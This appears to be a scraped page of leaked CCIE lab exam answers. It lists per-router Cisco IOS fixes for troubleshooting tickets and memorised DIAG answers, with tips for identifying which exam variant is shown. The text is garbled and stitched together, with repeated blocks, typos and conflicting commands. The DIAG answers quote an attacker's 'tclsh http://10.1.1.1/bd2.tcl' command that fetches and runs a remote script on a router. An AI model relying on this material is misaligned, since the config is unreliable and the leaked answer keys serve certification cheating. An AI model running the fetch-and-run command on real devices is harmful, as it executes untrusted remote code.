Professional Documents
Culture Documents
TS1 TS2 and DIAG
TS1 TS2 and DIAG
Ticket
A. PC101 must get an IP Address
3 MAC addresses must match
DHCP, Ports Security, PC itself
Q1: Layer 2
Q2: PPP
Q2: PPP
D. check if VTY has a problem
Q3: OSPF
R12>R3 (loopback)
R12>R4>R2>R1>R3
R12>R21 (loopback)
Q5: BGP R12>R6>R2>R1>R3>R21
R12>8.8.8.8 (traceroute 8.8.8.8 probe 2)
R12>R4|R6>R2>R1>R3>R21>R26
R12>192.1.1.1 (traceroute 194.1.1.1 probe 2)
R12>R4|R6>R2>R1>R5>R22>R26
A. Check the BGP neighbor
Q6: IPv6
Phone > Server4
Q7: DMVPN
B. Check VRF RT
BancoBank_ToHub
BancoBank_ToSpoke
PC104>PC106
PC104>SW3>R9>R5>R1>R3>R7>R3>R1>R2>R6>R10>SW4>PC106
SW2
vlan 12
int e0/0
sw tr al vl add 12
int e1/0
sw ac vl 100
int vlan 100
ip add 172.16.100.1 255.255.255.0
PC101
int e1/0
shut
no shut
R17
int s4/0
ppp chap hostname UberMarket_spoke_R17
ppp ipcp route default
no ppp auth chap callout
R12
ip local pool SPOKE1 145.67.89.22
R3
router ospf 12345
no area 1 range 134.56.78.0 255.255.255.0
R5
router ospf 12345
no max-metric router-lsa
R21
int e2/0
no ip opsf cost 1
R13
router eigrp 145
metric weights 0 1 1 1 1 1
ip access-list standard 10
no 10
int e1/0
no delay 1000
R14
no ip prefix-list DENY seq 5 deny 145.14.14.14/32
R12
ip access-list standard 1
5 deny 145.14.14.14
int e1/0
no bandwidth 1000
1x300 2x50
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
route-map MED permit 10
match ip address prefix-list 194
set metric 300
clear ip bgp * soft
R22
router bgp 12345
address-family ipv4
neighbor PEER next-hop-self
clear ip bgp * soft
R12
router bgp 12345
maximum-paths 2
R6
route-map MED permit 20
match ip address prefix-list 134
set metric 50
clear ip bgp * soft
R4
route-map MED permit 10
match ip address prefix-list 123
set metric 50
clear ip bgp * soft
R25
router bgp 65101
address-family ipv6
network 2001:CC1E:BEEF:25::/64
route-map NEXT-HOP permit 10
no set ipv6 next-hop 2001:3::3
set ipv6 next-hop 2001:CC1E:BEEF:2225::18
clear ip bgp * soft
R22
router bgp 12345
address-family ipv6
neighbor 123.1.2.18 route-map NEXT-HOP out
clear ip bgp * soft
R15
int tun0
ip nhrp redirect
no ip split-horizon eigrp 200
router eigrp 200
no redistribute connected metric 1 1 1 1 1
R18
int tun0
ip nhrp map multicast 145.67.89.10
R19
int tun0
no ip nhrp auth uSER789
ip nhrp auth USER789
ip nhrp shortcut
router eigrp 200
no eigrp stub connected summary
ip access-list extended DMVPN
permit esp any any
R20
router eigrp 200
no passive-interface e0/0
passive-interface e1/0
R7
router bgp 65100
neighbor 123.45.67.21 default-originate
! Missing at preconfig
redistribute static metric 1
no ip nat source list 100 int e0/0.125 overload
ip nat inside source list 100 int e0/0.125 overload
R8
router bgp 65100
neighbor 123.45.67.25 default-originate
! Missing at preconfig
redistribute static metric 1
R3
ip vrf BancoBank_ToHub
route-target import 65100:102
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252
R9
router ospf 65101
default-information originate
R7
no crypto isakmp key CCIE address 192.168.1.2
crypto isakmp key CCIE address 0.0.0.0
int tun10
shut / no shut
R24
crypto ipsec nat-transparency udp-encapsulation
no crypto transform-set CCIEXFORM esp-3des esp-md5-hmac
crypto transform-set CCIEXFORM esp-aes
mode transport
int tun10
shut / no shut
R23
ip dns server
no access-list 194 permit ip host 192.168.1.0 any
access-list 194 permit ip 192.168.1.0 0.0.0.255 any
no ip nat outside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
R24
int e0/0
no ip add 192.168.1.200 255.255.255.0 secondary
NAS
ip domain lookup
BT2
SW2
int e1/0
sw ac vl 100
shut
no switchport port-security mac-address aabb.cc00.2155
switchport port-security mac-address aabb.cc00.2111
no shut
router ospf 65100
no passive-interface vlan12
R12
int s4/0
no peer default ip address pool SPOKE11
peer default ip address pool SPOKE1
shut / noshut
R5
router ospf 12345
no max-metric router-lsa
R22
int e2/0
ip add 134.56.78.49 255.255.255.248
router ospf 12345
no passive-interface e0/0
R13
router eigrp 145
metric weights 0 1 1 1 1 1
R14
no ip prefix-list DENY seq 5 deny 145.14.14.14/32
R12
ip access-list standard 1
5 deny 145.14.14.14
1x50
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
router bgp 12345
network 134.21.21.21 mask 255.255.255.255
R5
router bgp 12345
address-family ipv4
neighbor 123.4.4.4 act
R4
route-map MED permit 10
match ip address prefix-list 123
set metric 50
clear ip bgp * soft
R25
router bgp 65101
address-family ipv6
no network 2001:CC1E:BEEF:25::1/128
network 2001:CC1E:BEEF:25::/64
R22
route-map NEXTHOP permit 10
no set ipv6 next-hop 2001:CC2E:BEEF:2225::17
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
R15
int tun0
ip nhrp redirect
no ip host user1spoke2 145.67.89.30
ip host user1spoke2 145.18.18.18
R18
int tun0
ip nhrp map multicast 145.67.89.10
R19
ip access-list extended DMVPN
permit esp any any
R7
router bgp 65100
default-information originate
no ip route 0.0.0.0 0.0.0.0 124.45.67.21
ip route 0.0.0.0 0.0.0.0 125.45.67.21
int e0/0.125
ip nat outside
R8
router bgp 65100
no neighbor 124.45.67.25 shut
default-information originate
int e0/0.123
ip nat inside
R3
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252
R4
int e2/0
ip ospf cost 1000
R6
ip vrf BancBank
route-target import 65100:100
int e2/0
ip ospf cost 1000
R7
no crypto isakmp key CCIE address 192.168.1.2
crypto isakmp key CCIE address 0.0.0.0
crypto isakmp policy 10
group 14
int tun10
shut / no shut
R24
crypto isakmp nat-transparency udp-encapsulation
router ospf 65100
network 172.247.247.0 0.0.0.3 area 3
int tun10
shut / no shut
R23
no ip nat outside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip dhcp pool NAS
no client-identifier aabb.cc00.0000
client-identifier 01aa.bbcc.0000.00
ip name-server 8.8.8.8
R24
int e0/0
no ip add 192.168.1.200 255.255.255.0 secondary
R21
ip domain lookup
NAS
ip http server
BT3
SW2
int vlan100
ip add 172.16.100.1 255.255.255.0
ip helper-address 172.8.8.8
int e1/0
shut / no shut
vlan 12
SW1
router ospf 65100
no passive-interface vlan12
R8
ip dhcp pool HOST1
default-router 172.16.100.1
PC101
int e0/0
mac-address aabb.cc00.2111
shut / no shut
R17
int s4/0
ppp ipcp route default
ppp chap password ccie
shut / no shut
line vty 0 4
transport input telnet
R12
no ip local pool SPOKE1 145.67.89.222
ip local pool SPOKE1 145.67.89.22
int s4/0
shut / no shut
R3
int e2/0
no ip ospf hello-interval 11
router ospf 12345
no area 1 range 134.56.78.0 255.255.255.0
R1
int e1/0
no ip ospf cost 1
R21
router ospf 12345
no passive-interface e0/0
no max-metric router-lsa
R22
int e0/0
no ip ospf network point-to-point
int e2/0
ip add 134.56.78.49 255.255.255.248
R13
int e0/0
ip add 145.67.89.6 255.255.255.252
R14
no ip prefix-list DENY seq 5 deny 145.14.14.14/32
router eigrp 145
metric weights 0 1 1 1 1 1
no passive-interface e1/0
R12
ip access-list standard 1
5 deny 145.14.14.14
R11
int eth1/0
no ip auth mode eigrp 145 md5
2x50
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
clear ip bgp * soft
router bgp 12345
neighbor PEER next-hop-self
R22
router bgp 12345
neighbor PEER update-source l0
R5
router bgp 12345
address-family ipv4
neighbor 123.4.4.4 act
R12
router bgp 14567
maximum-paths 2
no neighbor 123.45.67.45 shut
R2
int e1/0
mpls ip
int e2/0
mpls ip
R6
route-map MED permit 20
match ip address prefix-list 134
set metric 50
clear ip bgp * soft
R4
route-map MED permit 10
match ip address prefix-list 123
set metric 50
clear ip bgp * soft
R25
route-map NEXTHOP permit 10
no set ipv6 next-hop 2001:3::3
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
router bgp 65101
address-family ipv6
neighbor 123.1.2.17 route-map NEXT-HOP out
R22
route-map NEXTHOP permit 10
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
router bgp 12345
address-family ipv6
neighbor 123.1.2.18 route-map NEXT-HOP out
no neighbor 123.1.2.18 shut
clear ip bgp * soft
R15
router eigrp 200
no redistribute connected metric 1 1 1 1 1
int tun0
ip nhrp redirect
R17
int tun0
tunnel protection ipsec profile DMVPNPROFILE
R19
router eigrp 200
no eigrp stub connected summary
ip access-list extended DMVPN
permit esp any any
int tun0
ip nhrp nhs 215.0.0.1
R20
router eigrp 200
no passive-interface default
network 145.67.89.81 0.0.0.0
R7
router bgp 65100
neighbor 124.45.67.21 remote-as 12345
default-information originate
int e0/0.125
ip nat outside
no ip nat outside source list 100 interface e0/0.125 overload
ip nat inside source list 100 interface e0/0.125 overload
int e0/0.123
ip nat inside
R8
access-list 100 permit ip 172.16.201.0 0.0.0.255 any
int e0/0.125
ip nat outside
router bgp 65100
default-information originate
R3
router bgp 12345
address-family vpnv4
neighbor 123.5.5.5 act
ip vrf BancoBank_ToHub
route-target import 65100:101
route-target import 65100:102
R4
int e2/0
ip ospf cost 1000
R6
int e2/0
ip ospf cost 1000
R9
router ospf 65101
default-information originate
R5
int s4/0
ip vrf forwarding BancoBank
ip add 123.65.1.29 255.255.255.252
R7
int tun10
shut / no shut
R24
crypto ipsec nat-transparency udp-encapsulation
no crypto isakmp key CC1E address 0.0.0.0
crypto isakmp key CCIE address 0.0.0.0
router ospf 65100
no passive-interface tun10
int tun10
shut / no shut
R23
no ip nat source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 int s4/0 8008
ip dns server
ip name-server 8.8.8.8
R21
ip domain lookup
ip name-server 8.8.8.8
int s4/0
ip add 134.56.78.9 255.255.255.252
NAS
int e0/0
ip add dhcp client-id e0/0
BT4
SW2
int e0/0
sw tr al vl add 12
int vlan 100
ip helper-add 172.8.8.8
R8
no ip host SERVER1 172.16.200.1
ip host SERVER 172.16.200.200
ip dhcp pool HOST1
client-identifier 01aa.bbcc0021.11
R17
int s4/0
ppp chap password CCIE
ppp ipcp route default
ip access-list standard 1
no 10
R12
int s4/0
peer default ip address pool SPOKE1
shut / no shut
R3
router ospf 12345
network 134.56.78.37 0.0.0.0 area 1
int eth0/0
no ip ospf network point-to-point
R22
router ospf 12345
no network 134.56.78.41 0.0.0.0 area 1
network 134.56.78.42 0.0.0.0 area 1
int eth2/0
no ip ospf cost 1
R13
router eigrp 145
metric weights 0 1 1 1 1 1
R14
router eigrp 145
no passive-interface default
1x50
R21
router bgp 12345
no neighbor PEER route-map LP in
neighbor PEER route-map LP out
R22
router bgp 12345
address-family ipv4
neighbor PEER next-hop-self
R3
ip access-list extended 100
no 10
router bgp 12345
no neighbor 123.6.6.6 password cisco
no neighbor 123.4.4.4 shutdown
R12
router bgp 14567
maximum-paths 2
R4
route-map MED permit 10
match ip address prefix-list 123
set metric 50
clear ip bgp * soft
R22
route-map NEXT-HOP permit 10
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
router bgp 12345
address-family ipv6
neighbor 123.1.2.18 route-map NEXT-HOP out
ip access-list extended 100
no 20
R15
int tun0
ip nhrp redirect
no ip host user1SPOKE 145.18.18.18
R18
router eigrp 200
no eigrp stub receive-only
R19
ip access-list extended DMVPN
permit esp any any
int tun0
ip nhrp nhs 215.0.0.1
no tunnel source e0/0
tunnel source s4/0
R20
int e0/1
ip add 200.100.0.81 255.255.255.252
PC109
no ip domain timeout 1000
R7
int e0/0.124
no ip nat outside
ip nat inside
int e0/0.125
no ip nat inside
ip nat outisde
router bgp 65100
default-information originate
no ip route 0.0.0.0 0.0.0.0 124.45.67.21
ip route 0.0.0.0 0.0.0.0 125.45.67.21
R3
router bgp 12345
no neighbor 123.4.4.4 shutdown
R4
ip vrf BancoBank_ToHub
route-target import 65100:101
R7
int tun10
tunnel source e0/0.125
R24
int tun10
tunnel protection ipsec profile DMVPNPROFILE
router ospf 65100
no network 172.247.247.4 0.0.0.3 area 3
network 172.247.247.0 0.0.0.3 area 3
R21
int s4/0
no peer default ip address pool R21
peer default ip address pool R23
shut / no shut
R23
ip dhcp pool NAS
default-router 192.168.1.1
R24
int e0/0
no ip add 192.168.1.200 255.255.255.0 secondary
NAS
int e0/0
mac-address aabb.cc00.0000
shut / no shut
BT5
SW2
ip access-list extended 100
no 10
access-list 100 deny ip any host 172.16.100.200
access-list 100 permit ip any any
int vlan 100
ip access-group 100 out
SW1
router ospf 65100
network 172.16.200.0 0.0.0.255 area0
ip access-list standard 10
no 20
20 permit 17.16.200.0 0.0.0.255
access-list 10 permit 0.0.0.0
access-list 10 permit 172.16.200.0
int vlan200
ip access-group 10 in
R17
int s4/0
encapsulation ppp
ppp chap hostname UberMarket_spoke_R17
ppp chap password CCIE
ppp ipcp route default
R12
no ip prefix-list DENY seq 5 deny 145.67.89.20/30 le 32
clear ip eigrp neighbors
R3
ip access-list extended 100
no 10
access-list 100 deny ospf any any
access-list 100 permit ip any any
int e2/0
ip access-group 100 in
R21
router ospf 12345
router-id 134.21.21.21
clear ip ospf process [yes]
R22
router ospf 12345
no passive-interface e0/0
router-id 134.22.22.22
clear ip ospf process [yes]
R13
router eigrp 145
metric weights 0 1 1 1 1 1
R14
router eigrp 145
no passive-interface e1/0
R12
router eigrp 145
no passive-interface e1/0
1x10
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
router bgp 12345
no neighbor 134.67.78.6 route-map LP out
neighbor 134.56.78.6 route-map LP in
clear ip bgp * soft
R5
route-map NEXT-HOP permit 10
no set ip next-hop 123.45.67.45
clear ip bgp * soft
R2
int e0/0
mpls ip
R6
ip prefix-list DENY seq 3 permit 134.21.21.21/32
clear ip bgp * soft
R4
route-map MED permit 10
match ip address prefix-list 123
set metric 10
ip prefix-list DENY seq 3 permit 123.3.3.3/32
clear ip bgp * soft
R22
ip access-list extended 100
5 permit tcp any any eq 179
[10 deny tcp any any]
int s4/0
ip access-group 100 in
ip access-group 100 out
R15
int tun0
ip nhrp redirect
R17
int tun0
ip nhrp shortcut
R18
int tun0
ip nhrp shortcut
R19
int tun0
ip nhrp shortcut
R14
access-list 100 permit esp any any
PC109
ip domain lookup
R7
router bgp 65100
default-information originate
R8
int eth0/0.124
ip nat inside
R4
int e2/0
ip ospf cost 1000
R6
router bgp 12345
address-family vpnv4
neighbor 123.3.3.3 act
int e2/0
ip ospf cost 1000
R9
ip dhcp pool PC104
default-router 172.16.101.9
router bgp 65101
redistribute ospf 65101 match internal external 1 external 2
SW3
router ospf 65101
network 172.16.101.9 0.0.0.0 area 0
PC104
int e0/0
ip address dhcp client-id e0/0
R21
access-list 123 permit ip any any
R23
ip dhcp pool NAS
client-identifier 01aa.bbcc.0030.00
ip domain lookup
NAS
int e0/0
ip add dhcp client-id e0/0
Test1
SW1
router ospf 65100
network 172.16.200.0 0.0.0.255 area 0
ip access-list standard 10
no 20 [permit 172.16.200.0]
20 permit 172.16.200.0 0.0.0.255
R17
int s4/0
encapsulation ppp
ppp chap hostname UberMarket_spoke_R17
ppp chap password CCIE
ppp ipcp route default
R21
router ospf 12345
router-id 134.21.21.21
clear ip ospf process [yes]
R13
router eigrp 145
metric weights 0 1 1 1 1 1
R12
router eigrp 145
no passive-interface e1/0
1x10
R2
int e0/0
mpls ip
R5
route-map NEXT-HOP permit 10
no set ip next-hop 123.45.67.45
clear ip bgp * soft
R6
ip prefix-list DENY seq 3 permit 134.21.21.21/32
clear ip bgp * soft
R4
route-map MED permit 10
match ip address prefix-list 123
set metric 10
ip prefix-list DENY seq 3 permit 123.3.3.3/32
clear ip bgp * soft
R22
ip access-list extended 100
5 permit tcp any any eq 179
[10 deny tcp any any]
R15
int tun0
ip nhrp redirect
R19
int tun0
ip nhrp shortcut
R14
access-list 100 permit esp any any
PC109
ip domain lookup
R7
router bgp 65100
default-information originate
R4
int e2/0
ip ospf cost 1000
R6
int e2/0
ip ospf cost 1000
R9
ip dhcp pool PC104
default-router 172.16.101.9
SW3
router ospf 65101
network 172.16.101.9 0.0.0.0 area 0
PC104
int e0/0
ip address dhcp client-id e0/0
R21
access-list 123 permit ip any any
R23
ip dhcp pool NAS
client-identifier 01aa.bcc.0030.00
ip domain lookup
NAS
int e0/0
ip address dhcp client-id e0/0
Test2
SW2
int vlan100
ip add 172.16.100.1 255.255.255.0
R17
int s4/0
encapsulation ppp
ppp ipcp route default
R12
int s4/0
no peer default ip address pool user1spoke1
peer default ip address dhcp-pool user1spoke1
R3
router ospf 12345
no max-metric router-lsa
R12
router eigrp 145
no passive-interface e1/0
R1
int e0/0
no ip ospf network point-to-point
R5
router bgp 12345
address-family ipv4
neighbor IBGP route-reflector-client
R22
router bgp 12345
addres-family ipv6
neighbor 2001:CC1E:BEEF:2225::18 act
R15
int tun0
ip nhrp redirect
R18
int tun0
ip nhrp nhs 215.0.0.1
R3
int e1/0.123
ip vrf forwarding BancoBank_ToSpoke
ip add 123.45.67.21 255.255.255.252
R4
int e2/0
ip ospf cost 1000
R6
int e2/0
ip ospf cost 1000
R9
router ospf 65101
default-information originate
R24
int tun10
no ip ospf network broadcast
R23
no ip nat source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
V1
SW2
vlan 12
int e1/0
sw ac vl 100
router ospf 65100
no passive-interface vlan12
R17
int s4/0
ppp ipcp route default
no ppp authentication chap callout
R12
router bgp 14567
network 145.6.89.20 mask 255.255.255.252
R5
router ospf 12345
no max-metric router-lsa
R21
int e2/0
no ip ospf cost 1
R13
int e1/0
no delay 1000
R12
int e1/0
no bandwidth 1000
1x100
R21
ip prefix-list 194 permit 194.1.1.0/24
router bgp 12345
no neighbor 134.56.78.6 route-map MED out
neighbor 134.56.78.6 route-map MED in
clear ip bgp * soft
R12
router bgp 14567
maximum-paths 2
R6
route-map MED permit 10
match ip address prefix-list 194
set metric 100
clear ip bgp * soft
R25
route-map NEXT-HOP permit 10
no set ipv6 next-hop 2001:3::3
set ipv6 next-hop 2001:CC1E:BEEF:2225::18
clear ip bgp * soft
R22
route-map NEXT-HOP permit 10
no set ipv6 next-hop 2001:2::2
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
clear ip bgp * soft
R15
router eigrp 200
no redistribute connected metric 1 1 1 1 1
int tun0
ip nhrp redirect
no ip split-horizon eigrp 200
R18
int tun0
ip nhrp shortcut
no ip nhrp map 145.67.89.10 215.0.0.1
ip nhrp map 215.0.0.1 145.67.89.10
ip nhrp map multicast 145.67.89.10
R19
int tun0
ip nhrp shortcut
no ip nhrp map 145.67.89.10 215.0.0.1
ip nhrp map 215.0.0.1 145.67.89.10
R7
router bgp 65100
neighbor 123.45.67.21 default-originate
no ip nat source list 100 int e0/0.125 overload
ip nat inside source list 100 e0/0.125 overload
R8
router bgp 65100
neighbor 123.45.67.25 default-originate
R3
ip vrf BancoBank_ToHub
route-target import 65100:101
route-target import 65100:102
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252
R4
ip vrf BancoBank_ToHub
route-target import 65100:101
route-target import 65100:102
R9
router ospf 65101
default-information originate
R10
router ospf 65102
default-information originate
R7
crypto isakmp policy 10
group 14
router ospf 65100
network 172.247.247.1 0.0.0.0 area 3
R24
crypto ipsec nat-transparency udp-encapsulation
R23
no ip nat source static tcp 192.168.1.200 23 interface s4/0 2323
ip nat inside source static tcp 192.168.1.200 23 int s4/0 2323
no ip nat source static tcp 192.168.1.2000 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
NAS
int e0/0
mac-address aabb.cc00.0000
shut / no shut
R6#sh run | s vrf R5#sh run | s vrf
ip vrf BancBank ip vrf BancBank
rd 65100:102 rd 65100:101
route-target export 65100:102 route-target export 65100:101
route-target import 65100:100 route-target import 65100:100
B. Check HSRP
Q1: Layer 1
Q3: BGP2
note:
Access list 1 - for odd
Access list 2 - for even
Q4: BGP2
Q5: DMVPN
Q6: IPv6
B. Check OSPFv3 on SW111
Q6: IPv6
A. Check SW300/301
Q8: Security
Q9: DMVPN
Q9: DMVPN
Q10: NAT
BT2
SW400
ip access-list extended 111
no 10
no 30
router ospf 65004
no passive-interface vlan2000
SW401
ip access-list extended 111
no 10
no 30
R40
ip dhcp pool xx
lease 0 2 1
R41
ip dhcp pool xx
lease 0 2 1
SW110
int e2/0
no ip ospf cost 100
SW111
int e2/0
no ip ospf cost 100
R12
clear ip bgp * soft
R22
route-map MED permit 20
match ip address 2
set metric 1
set origin igp
clear ip bgp * soft
R23
route-map MED permit 20
match ip address 2
set metric 1
set origin incomplete
clear ip bgp * soft
int l0
no ip ospf 10 area 0
ip ospf 1 area 0
R20
router bgp 65002
neighbor DC2 route-map LP out
clear ip bgp * soft
R21
router bgp 65002
neighbor DC2 route-map LP out
clear ip bgp * soft
R60
int tun0
ip add 10.100.0.60 255.255.255.0
R15
router bgp 65001
address-family ipv6
network 2001:CC:1E:8BAD:2001::/104
SW111
int vlan2001
ospfv3 65001 ipv6 area 0
R5
int e0/1
no ip ospf 10 area 0
ip ospf 1 area 0
R10
router ospf 65001
distance ospf external 210
SW300/SW301
int vlan2000
ip dhcp relay information trusted
SW300
router ospf 65003
no passive-interface vlan2000
SW310
ip dhcp snooping information option
port-channel2
ip arp inspection validate
port-channel1
ip arp inspection validate
ip dhcp pool xx
lease 0 2 1
User3
int e0/0
shut / no shut
R71
int tun0
ip ospf network point-to-point
R24/25
ip nat outside source static 201.99.70.2 201.99.25.70
3.1
SW400
vlan access-map ATTACK 20
action forward
SW401
vlan access-map ATTACK 20
action forward
User4
int e0/0
shut / no shut
SW111
int vlan2001
ip ospf 65001 area 0
R14
router bgp 65001
neighbor DC1 next-hop-self
clear ip bgp * soft
SW101
int e1/2
no ip ospf cost 1
R12
no access-list 1 permit 10.2.1.0 0.0.254.255
no access-list 2 permit 10.2.0.0 0.0.254.255
access-list 1 permit 10.1.1.0 0.0.254.255
access-list 2 permit 10.1.0.0 0.0.254.255
clear ip bgp * soft
R13
no access-list 1 permit 10.2.1.0 0.0.254.255
no access-list 2 permit 10.2.0.0 0.0.254.255
access-list 1 permit 10.1.1.0 0.0.254.255
access-list 2 permit 10.1.0.0 0.0.254.255
clear ip bgp * soft
R21
route-map LP permit 10
match ip address prefix-list LP
set local-preference 200
clear ip bgp * soft
R14
int tun0
ip ospf network point-to-multipoint
R51
int tun0
ip ospf network point-to-multipoint
R60
int tun0
ip ospf network point-to-multipoint
R15
router bgp 65001
address-family ipv6
network 2001:CC:1E:8BAD:2001::/104
R5
ip vrf GLOBALISP
no route-target export 65005:5
route-target export 65003:3
R1
int lo0
ip ospf 10000 area 0
R3
int e0/1
mpls ip
SW300/SW301
int vlan 2000
ip dhcp relay information trusted
User3
int e0/0
shut / no shut
R71
int tun0
tunnel key 10000
R25
no ip nat inside source static tcp 201.99.25.2 23 10.2.200.1 23
ip nat inside source static tcp 10.2.200.1 23 201.99.25.2 23
ip nat outside source static 201.99.70.2 200.8.8.8
(copy from R24 it is correct)
Tickets H1 Diag
DIAGs comes with a set. They don’t come with mixed questionnaires
Ticket 1
Question 1 the material provided in which one of best to help you determine fault?
Device SW3; Command line: show ip int brief
Question 2 Indicate which information collected on which device you require from the helpdesk in
order to confirm your suspicien
Collect on device: Host_1
Required information:what's the mac address of E0/0
Ticket 2
Question 1 after considering all information provided. Point and click on the device that is
responsible for causing the report sympton.
R15
Question 2 Recommend a possible solution to this issue as well as on which device it must be
configured:
Exclude the ip prefix of E0/0 into EIGRP
Ticket 3
Question 2 After considering all information provided, identify the root cause of the issue:
Asysmmetric routing with Unicast RPF.
H1+ Diag
the material provided in which one of best to help you determine fault?
Device SW3; Command line: show spanning-tree summary
Indicate which information collected on which device you require from the helpdesk in order
to confirm your suspicien
Collect on device: SW3
Required information:show vtp password
after considering all information provided. Point and click on the device that is responsible for
causing the report sympton.
R16
Recommend a possible solution to this issue as well as on which device it must be configured:
Increase the mask Length of R16 interface E0/0
After considering all information provided, identify the root cause of the issue:
strict unicast RPF dropping packets and pre-destination load-balancing
How to differentiate the H3 DIAG and H3+ DIAG
If you find SW3 'show ip interface brief E0/0' is down ,this set is H1 DIAG
If u find SW3 show spanning summary only has vlan 1, this sets is H1+ DIAG
If you find E0/0 of R16 mask length is /30 ,this one is H1 DIAG
If you find E0/0 of R16 mask length is /29 ,this one is H1+ DIAG
You just see the last question answer
H1 DIAG is unicast RPF
H1+ DIAG is strict + pre-destination
Tickets H2 Diag
DIAGs comes with a set. They don’t come with mixed questionnaires
Ticket 1
Ticket 2
Question 1 What is the issue
R3 has no route to RP
Question 2 You will ask what to your engineer ?
why is 10.4.1.0/24 not in R3's RIB.
Question 3 how to deal with current issues temporary ?
R3 (config) ip route 10.4.1.1 255.255.255.255 10.0.0.17
//note: 10.0.0.17 is the address of R4, if u find next-hop is wrong, you can choose
R3(config)#ip mroute 10.4.1.1 255.255.255.255 10.0.0.17
H2+ Diag
if u can find the command line” configure CE2 with highest HSRPv6 priority” It is H2 DIAG
if u can not find the command line” configure CE2 with highest HSRPv6 priority” It is H2+ DIAG
Ticket 1
between SW1-SW3
Ticket 2
Question 2 Which command if issued from the Hacker end can bring down the
complete system?
power off
Question 3 which command is attacker is using ?
tclsh http://10.1.1.1/bd2.tcl
other options (not to be selected)!!!
http://10.1.1.1/bd2.tcl
copy http://10.1.1.1/bd2.tcl
H3+ Diag
traffic_capture_DHCP_SNOOP_0001.pcapng
between SW1-SW3
traffic_capture_TCL_SCRIPTING_0001.pcapng
Which command if issued from the Hacker end can bring down the
complete system?
power off
which command is attacker is using ?
tclsh http://10.1.1.1/bd2.tcl
other options (not to be selected)!!!
http://10.1.1.1/bd2.tcl
copy http://10.1.1.1/bd2.tcl
H3++ Diag
What is the problem that can you get from the packet?
Its source IP Address is 0.0.0.0
between SW1-SW3
http.request.method==GET
tcp.stream eq 0-4
png tcp.port==3001
Which command if issued from the Hacker end can bring down
the complete system?
power off
which command is attacker is using ?
tclsh http://10.1.1.1/bd2.tcl
other options (not to be selected)!!!
http://10.1.1.1/bd2.tcl
copy http://10.1.1.1/bd2.tcl
H3+++ Diag
between SW1-SW3
Which command if issued from the Hacker end can bring down the
complete system?
power off
which command is attacker is using ?
tclsh http://10.1.1.2/bd2.tcl
How to differentiate the H3 DIAG and H3+ DIAG
1.1
1.2 Jameson's DC trunk ports
1.3 Jameson's DC link bundling
1.4 Jameson's DC Branch Offices
2.1 Jameson's IGP Part1
2.2 Jameson's IGP Part2
2.3 Jacob's IGP
Jameson's Pre-merge
2.4
2.5 Jacob's pre-merge
2.6 Merge Phase 1 - BGP
2.7 Merge Phase 2 - IGP
2.8 Merge Phase 2 - Routing Policies
2.9 IPv6 Routing Part1
2.10 IPv6 Routing Part2
2.11 Multicasting in Jamesons
3.1 Jameson's Branch Offices
3.2 Jameson's Pre-merge VPN
3.3 Merge Phase 2 - VPN
3.4 Inter-VPN Routing
4.1 Device Security
4.2 Network Security
5.1 Centralized DHCP
5.2 Internet Gateway
5.3 First Hop redundancy
5.4 Tracking and Reachability
H2 CONF H2+ CONF
SW3 - VTP server SW3/SW4/SW5/SW6 - VTP Transparent
SW4/SW5/SW6 - VTP client
snmp-traps
Rapid-PVST MST
LACP PAGP
PPP PPP within VRF
OSPF with LSA2 OSPF without LSA2 in DC, the same to the rest
OSPF P2M, stub OSPF in VRF
Named EIGRP with, Tagging Named EIGRP with RIB Scale metric
R15/R16 - AS65005 deny normal redistribution.
default-info originate Default info facing the PE
match internal/ext 2
OSPF, redist bgp metric-ty 1